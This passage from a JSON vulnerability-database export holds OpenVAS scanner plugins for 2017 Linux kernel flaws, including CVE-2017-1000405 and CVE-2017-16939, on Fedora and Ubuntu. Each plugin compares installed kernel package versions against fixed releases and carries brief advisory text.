'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-b0c1f44130\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X6LLKSHB3TZCA72UK4KDILWHY4Q4RTGU\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local 
Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.13.16~302.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-12-05T00:00:00", "id": "OPENVAS:1361412562310873857", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873857", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2017-9ea11e444d", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_9ea11e444d_kernel_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2017-9ea11e444d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873857\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-05 07:54:59 +0100 (Tue, 05 Dec 2017)\");\n script_cve_id(\"CVE-2017-1000405\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2017-9ea11e444d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-9ea11e444d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2ALUMLCIZOR6UUC5NJKXPGIAXHBJR6NL\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.13.16~202.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843394", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843394", "type": "openvas", "title": "Ubuntu Update for linux USN-3510-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3510_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3510-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843394\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:23 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3510-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mohamed Ghannam discovered that a\n use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the\n Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16939) It was\n discovered that the Linux kernel did not properly handle copy-on- write of\n transparent huge pages. 
A local attacker could use this to cause a denial of\n service (application crashes) or possibly gain administrative privileges.\n (CVE-2017-1000405)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3510-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3510-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-generic\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-generic-lpae\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-lowlatency\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc-e500\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc-e500mc\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc-smp\", 
ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc64-emb\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc64-smp\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "cvelist": 
["CVE-2017-16939", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843393", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843393", "type": "openvas", "title": "Ubuntu Update for linux-azure USN-3511-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3511_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-azure USN-3511-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843393\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:17 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-azure USN-3511-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-azure'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mohamed Ghannam discovered that a\n use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the\n Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16939) It was\n discovered that the Linux kernel did not properly handle copy-on- write of\n transparent huge pages. 
A local attacker could use this to cause a denial of\n service (application crashes) or possibly gain administrative privileges.\n (CVE-2017-1000405)\");\n script_tag(name:\"affected\", value:\"linux-azure on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3511-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3511-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.11.0-1016-azure\", ver:\"4.11.0-1016.16\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-azure\", ver:\"4.11.0.1016.16\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12146", "CVE-2017-16939", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843397", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843397", "type": "openvas", "title": "Ubuntu Update for linux USN-3508-1", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3508_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3508-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843397\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:49 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12146\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3508-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n 
script_tag(name:\"insight\", value:\"Mohamed Ghannam discovered that a\n use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the\n Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16939) It was\n discovered that the Linux kernel did not properly handle copy-on- write of\n transparent huge pages. A local attacker could use this to cause a denial of\n service (application crashes) or possibly gain administrative privileges.\n (CVE-2017-1000405) Yonggang Guo discovered that a race condition existed in the\n driver subsystem in the Linux kernel. A local attacker could use this to\n possibly gain administrative privileges. (CVE-2017-12146)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 17.04\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3508-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3508-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU17\\.04\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-1023-raspi2\", ver:\"4.10.0-1023.26\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-generic\", ver:\"4.10.0-42.46\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"linux-image-4.10.0-42-generic-lpae\", ver:\"4.10.0-42.46\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-lowlatency\", ver:\"4.10.0-42.46\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.10.0.42.42\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.10.0.42.42\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.10.0.42.42\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.10.0.1023.24\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12146", "CVE-2017-16939", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843396", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843396", "type": "openvas", "title": "Ubuntu Update for linux-hwe USN-3508-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3508_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-hwe USN-3508-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of 
the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843396\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:42 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12146\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-hwe USN-3508-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-hwe'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3508-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 17.04. This update provides the corresponding updates\n for the Linux Hardware Enablement (HWE) kernel from Ubuntu 17.04 for Ubuntu\n 16.04 LTS. Mohamed Ghannam discovered that a use-after-free vulnerability\n existed in the Netlink subsystem (XFRM) in the Linux kernel. 
A local attacker\n could use this to cause a denial of service (system crash) or possibly execute\n arbitrary code. (CVE-2017-16939) It was discovered that the Linux kernel did not\n properly handle copy-on- write of transparent huge pages. A local attacker could\n use this to cause a denial of service (application crashes) or possibly gain\n administrative privileges. (CVE-2017-1000405) Yonggang Guo discovered that a\n race condition existed in the driver subsystem in the Linux kernel. A local\n attacker could use this to possibly gain administrative privileges.\n (CVE-2017-12146)\");\n script_tag(name:\"affected\", value:\"linux-hwe on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3508-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3508-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-generic\", ver:\"4.10.0-42.46~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-generic-lpae\", ver:\"4.10.0-42.46~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-lowlatency\", ver:\"4.10.0-42.46~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-hwe-16.04\", ver:\"4.10.0.42.44\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-hwe-16.04\", ver:\"4.10.0.42.44\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-hwe-16.04\", ver:\"4.10.0.42.44\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-09T00:00:00", "id": "OPENVAS:1361412562310843400", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843400", "type": "openvas", "title": "Ubuntu Update for linux-aws USN-3509-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3509_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-aws USN-3509-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843400\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-09 07:39:26 +0100 (Sat, 09 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12193\", \"CVE-2017-16643\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-aws USN-3509-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-aws'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3509-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding\n updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for\n Ubuntu 14.04 LTS. Mohamed Ghannam discovered that a use-after-free vulnerability\n existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\n could use this to cause a denial of service (system crash) or possibly execute\n arbitrary code. (CVE-2017-16939) It was discovered that the Linux kernel did not\n properly handle copy-on- write of transparent huge pages. 
